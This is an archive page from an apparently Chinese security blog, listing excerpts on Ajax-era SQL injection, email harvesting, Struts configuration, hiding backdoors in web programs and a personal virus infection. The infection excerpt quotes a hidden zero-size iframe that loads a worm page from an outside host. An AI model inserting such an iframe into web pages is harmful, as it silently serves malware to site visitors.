来源:IT168 作者:空虚浪子心
【编者按】本文为了能够更为清晰的表述SQL注入在Ajax时代依然是安全隐患,在互联网上随机搜索到存在此类安全漏洞的网站。
这个例子也证明了SQL注入并非是Web1.0时代的专利,当新兴技术如Ajax发展促使互联网演进到2.0时代时,这种入侵方法依[……]
作者存档: 空虚浪子心 - 第11页
Ajax时代 SQL注入依然是隐患
作者: 空虚浪子心 日期: 2007 年 06 月 12 日 没有评论 | 3,555 views
Ajax让Sohu邮箱成为垃圾邮件的帮凶
作者: 空虚浪子心 日期: 2007 年 06 月 06 日 没有评论 | 4,046 views
【IT168 专稿】今天,电子邮箱(E-mail)无疑已经成为大众通讯的工具;由于垃圾邮件泛滥,E-mail也成为信息安全的重大隐患之一。搜索到有效邮件地址成为垃圾邮件发送成功与否的决定要素。随着Ajax新兴技术在大型网站,如SOHU等得到应用,使得垃圾邮件制造者有机可乘。
现在浏览器端以[……]
AJAX带来了一些安全隐患…
作者: 空虚浪子心 日期: 2007 年 05 月 21 日 没有评论 | 3,601 views
郁闷…STRUTS标签.
作者: 空虚浪子心 日期: 2007 年 05 月 21 日 没有评论 | 3,499 views
下午一个项目,一访问某个JSP页面,SESSION里的USER竟然不存在了…气死了….
找原因…原来是
code:
<logic:iterate id="user" name="result" type="com.*****.v[……]
C://myheart//system32//Logfiles//W3SVC1//ex070415.log
作者: 空虚浪子心 日期: 2007 年 04 月 15 日 没有评论 | 3,948 views
#Software: Microsoft Internet Information Services 5.1
#Version: 1.0
#Date: 2007-04-15 09:47:02
#Fields: time c-ip cs-method cs-uri-stem sc-status
08[……]
在WEB程序中隐藏后门
作者: 空虚浪子心 日期: 2007 年 04 月 14 日 没有评论 | 5,169 views
作者: 空虚浪子心
在很多商业程序中,程序员也许会出于某种目的,在程序中留下后门。我们不讨论这样做的目的是什么,只谈谈如何在程序中隐藏一个“终极后门”。
首先给大家看一个例子,去年我写了一篇文章《对校园网的第二次安全检测,文中提到一个类似的后门:“…隐藏账户做后门!…如果不是我先拿到[……]
struts-config.xml的配置以及过滤用户所有输入
作者: 空虚浪子心 日期: 2007 年 04 月 06 日 没有评论 | 5,182 views
struts-config.xml的配置笔记
/文 空虚浪子心
code:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE struts-config PUBLIC[……]
喝酒
作者: 空虚浪子心 日期: 2007 年 02 月 03 日 没有评论 | 7,329 views
我知道现在很晕…
我知道现在写的东西明天获取会删除掉…或许会改掉.但是,我还要写.
现在很麻木,晕….可能现在写的东西词不答意,因为被灌酒了.
感觉他们都在灌我.也许现在写的东西明天就不想看,想删除掉.
但是我还是想说.
馨仪,我最爱的人,不知道该说什么,我现在一直想的都是你.我晕的[……]
破熊猫…
作者: 空虚浪子心 日期: 2007 年 01 月 26 日 没有评论 | 4,483 views
前几天中了病毒…
EXE就不说了,我的大多EXE都有RAR的备份,竟然在我的asp.html,htm等文件中加入了
<iframe src=http://www.krvkr.com/worm.htm width=0 height=0></iframe>
NND…[……]